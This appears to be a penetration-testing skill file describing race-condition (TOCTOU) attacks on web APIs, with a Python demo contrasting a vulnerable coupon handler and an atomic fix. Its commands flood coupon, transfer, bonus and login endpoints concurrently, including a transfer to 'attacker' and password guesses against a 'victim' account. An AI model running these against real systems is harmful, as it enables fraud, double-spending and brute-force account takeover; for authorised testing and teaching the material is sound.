attack-race-condition
Race condition / TOCTOU testing — concurrent requests to exploit time-of-check-to-time-of-use flaws
| Field | Value |
|---|---|
| name | attack-race-condition |
| description | Race condition / TOCTOU testing — concurrent requests to exploit time-of-check-to-time-of-use flaws |
| category | web-application |
| version | 1.0 |
| author | cyberstrike-official |
| tags | ["race-condition","toctou","web","business-logic","attack"] |
| tech_stack | ["web"] |
| cwe_ids | ["CWE-362","CWE-367"] |
| chains_with | [] |
| prerequisites | [] |
| severity_boost | {} |
Exploit time-of-check-to-time-of-use (TOCTOU) vulnerabilities by sending concurrent requests that bypass server-side validation.
State-changing operations vulnerable to race conditions:
```bash
# Basic race test — 20 concurrent POST requests
attack_script race_tester "https://TARGET/api/redeem" \
  -m POST \
  -H "Authorization:Bearer TOKEN" \
  -d '{"coupon":"DISCOUNT50"}' \
  -c 20 \
  --json-output

# With delay (staggered)
attack_script race_tester "https://TARGET/api/transfer" \
  -m POST \
  -H "Authorization:Bearer TOKEN" \
  -d '{"to":"attacker","amount":100}' \
  -c 50 \
  --delay 5
```
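For critical timing, send all requests in a single TCP packet. The curl loop below only approximates this: each backgrounded `curl` opens its own connection, so arrival times still vary with network jitter, and a clean result from it does not rule out a race.

```bash
# Using curl with parallel connections
for i in $(seq 1 20); do
  curl -s -X POST https://TARGET/api/redeem \
    -H "Authorization: Bearer TOKEN" \
    -d '{"coupon":"DISCOUNT50"}' &
done
wait
```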
Look for:
```bash
# Race on rate-limited endpoint
attack_script race_tester "https://TARGET/api/login" \
  -m POST \
  -d '{"email":"victim@test.com","password":"guess1"}' \
  -c 30

# Race on one-time action
attack_script race_tester "https://TARGET/api/claim-bonus" \
  -m POST \
  -H "Authorization:Bearer TOKEN" \
  -c 20
```
| Finding | Severity |
|---|---|
| Financial: double-spend, duplicate transfer | Critical (P1) |
| Coupon/code reused multiple times | High (P2) |
| Rate limit bypassed via race | Medium (P3) |
| Duplicate record creation | Medium (P3) |
| Vote/like manipulation | Low (P4) |
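The coupon-reuse finding above comes from a server-side gap between checking a limit and recording its use. The following added example (not part of the original skill) shows that check-then-act pattern beside an atomic fix, using a local SQLite file. The table schema, function names and the barrier that holds requests inside the window are assumptions made for the demonstration.

```python
import os
import sqlite3
import tempfile
import threading

def make_db():
    # Constructed sample data: one single-use coupon in a throwaway database.
    path = os.path.join(tempfile.mkdtemp(), "coupons.db")
    with sqlite3.connect(path) as con:
        con.execute("CREATE TABLE coupons (code TEXT PRIMARY KEY, uses INTEGER, max_uses INTEGER)")
        con.execute("INSERT INTO coupons VALUES ('DISCOUNT50', 0, 1)")
    return path

def redeem_check_then_act(con, code, gate):
    # Vulnerable pattern (CWE-367): the check and the write are separate statements.
    uses, max_uses = con.execute(
        "SELECT uses, max_uses FROM coupons WHERE code = ?", (code,)).fetchall()[0]
    if uses >= max_uses:
        return False
    gate.wait()  # demo only: holds every request inside the check/use window
    con.execute("UPDATE coupons SET uses = uses + 1 WHERE code = ?", (code,))
    return True

def redeem_atomic(con, code, gate=None):
    # Hardened pattern: the limit is enforced inside the UPDATE itself, so the
    # database evaluates check and write as one atomic statement (gate unused).
    cur = con.execute(
        "UPDATE coupons SET uses = uses + 1 WHERE code = ? AND uses < max_uses", (code,))
    return cur.rowcount == 1

def run_concurrent(handler, workers=20):
    # Returns (requests that reported success, uses recorded in the database).
    path = make_db()
    gate = threading.Barrier(workers)
    results = []
    def worker():
        con = sqlite3.connect(path, timeout=30, isolation_level=None)  # autocommit
        results.append(handler(con, "DISCOUNT50", gate))
        con.close()
    threads = [threading.Thread(target=worker) for _ in range(workers)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    con = sqlite3.connect(path)
    uses = con.execute("SELECT uses FROM coupons").fetchone()[0]
    con.close()
    return sum(results), uses
```

With 20 workers the check-then-act handler records 20 redemptions of a single-use coupon, while the atomic handler records exactly one.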
attack_script race_tester — async concurrent request sender